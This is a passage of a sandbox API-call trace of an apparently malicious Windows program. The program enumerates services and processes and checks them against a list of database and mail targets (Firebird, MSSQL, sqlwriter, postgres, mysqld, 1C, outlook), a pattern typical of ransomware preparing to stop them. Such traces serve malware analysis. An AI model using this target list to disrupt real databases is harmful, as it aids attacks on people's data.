	[0168.839] lstrlenW (lpString="NlaSvc") returned 6
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0168.839] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0168.839] lstrlenW (lpString="nsi") returned 3
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0168.839] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0168.839] lstrlenW (lpString="PcaSvc") returned 6
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0168.839] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0168.839] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0168.839] lstrlenW (lpString="PlugPlay") returned 8
	[0168.839] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0168.839] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0168.840] lstrlenW (lpString="Power") returned 5
	[0168.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0168.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0168.840] lstrlenW (lpString="ProfSvc") returned 7
	[0168.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0168.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0168.840] lstrlenW (lpString="RpcEptMapper") returned 12
	[0168.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0168.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0168.840] lstrlenW (lpString="RpcSs") returned 5
	[0168.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0168.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0168.840] lstrlenW (lpString="SamSs") returned 5
	[0168.840] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0168.840] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0168.840] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0168.840] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0168.840] lstrlenW (lpString="Schedule") returned 8
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0168.841] lstrlenW (lpString="SENS") returned 4
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0168.841] lstrlenW (lpString="ShellHWDetection") returned 16
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0168.841] lstrlenW (lpString="Spooler") returned 7
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0168.841] lstrlenW (lpString="SysMain") returned 7
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0168.841] lstrlenW (lpString="Themes") returned 6
	[0168.841] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0168.841] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0168.841] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0168.841] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0168.842] lstrlenW (lpString="TrkWks") returned 6
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0168.842] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0168.842] lstrlenW (lpString="UxSms") returned 5
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0168.842] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0168.842] lstrlenW (lpString="WdiServiceHost") returned 14
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0168.842] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0168.842] lstrlenW (lpString="WdiSystemHost") returned 13
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0168.842] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0168.842] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.842] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.842] lstrlenW (lpString="Winmgmt") returned 7
	[0168.842] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0168.842] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0168.842] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0168.843] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0168.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0168.843] lstrlenW (lpString="WPDBusEnum") returned 10
	[0168.843] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0168.843] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0168.843] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0168.843] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0168.843] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0168.843] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0x7ba6360 | out: hHeap=0x7ab0000) returned 1
	[0168.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3a4
	[0168.845] Process32FirstW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0168.845] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0168.845] lstrlenW (lpString="System") returned 6
	[0168.845] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0168.845] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0168.845] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0168.846] lstrlenW (lpString="smss.exe") returned 8
	[0168.846] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0168.846] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0168.846] lstrlenW (lpString="csrss.exe") returned 9
	[0168.846] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0168.846] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0168.846] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0168.846] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0168.846] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0168.847] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0168.847] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0168.847] lstrlenW (lpString="wininit.exe") returned 11
	[0168.847] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0168.847] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0168.847] lstrlenW (lpString="csrss.exe") returned 9
	[0168.847] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0168.847] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0168.848] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0168.848] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0168.848] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0168.848] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0168.848] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0168.848] lstrlenW (lpString="winlogon.exe") returned 12
	[0168.848] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0168.848] lstrlenW (lpString="services.exe") returned 12
	[0168.848] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0168.849] lstrlenW (lpString="lsass.exe") returned 9
	[0168.849] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0168.849] lstrlenW (lpString="lsm.exe") returned 7
	[0168.849] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.850] lstrlenW (lpString="svchost.exe") returned 11
	[0168.850] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.850] lstrlenW (lpString="svchost.exe") returned 11
	[0168.850] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.850] lstrlenW (lpString="svchost.exe") returned 11
	[0168.850] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.851] lstrlenW (lpString="svchost.exe") returned 11
	[0168.851] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.851] lstrlenW (lpString="svchost.exe") returned 11
	[0168.851] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0168.851] lstrlenW (lpString="audiodg.exe") returned 11
	[0168.851] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.852] lstrlenW (lpString="svchost.exe") returned 11
	[0168.852] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.852] lstrlenW (lpString="svchost.exe") returned 11
	[0168.852] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0168.852] lstrlenW (lpString="spoolsv.exe") returned 11
	[0168.852] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0168.853] lstrlenW (lpString="svchost.exe") returned 11
	[0168.853] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0168.853] lstrlenW (lpString="taskhost.exe") returned 12
	[0168.853] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0168.853] lstrlenW (lpString="dwm.exe") returned 7
	[0168.853] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0168.854] lstrlenW (lpString="explorer.exe") returned 12
	[0168.854] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0168.855] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0168.855] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0168.855] lstrlenW (lpString="reader_sl.exe") returned 13
	[0168.855] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0168.855] lstrlenW (lpString="taskhost.exe") returned 12
	[0168.855] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.856] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.856] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.856] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.856] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0168.856] lstrlenW (lpString="rundll32.exe") returned 12
	[0168.856] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x51c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x7d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dinotify.exe")) returned 1
	[0168.857] lstrlenW (lpString="dinotify.exe") returned 12
	[0168.857] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0168.859] lstrlenW (lpString="dllhost.exe") returned 11
	[0168.859] Process32NextW (in: hSnapshot=0x3a4, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0
	[0168.859] CloseHandle (hObject=0x3a4) returned 1
	[0168.859] Sleep (dwMilliseconds=0x1f4) 
	[0169.461] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb51c710
	[0169.461] EnumServicesStatusExW (in: hSCManager=0xb51c710, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0169.461] GetLastError () returned 0xea
	[0169.461] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0xb617698
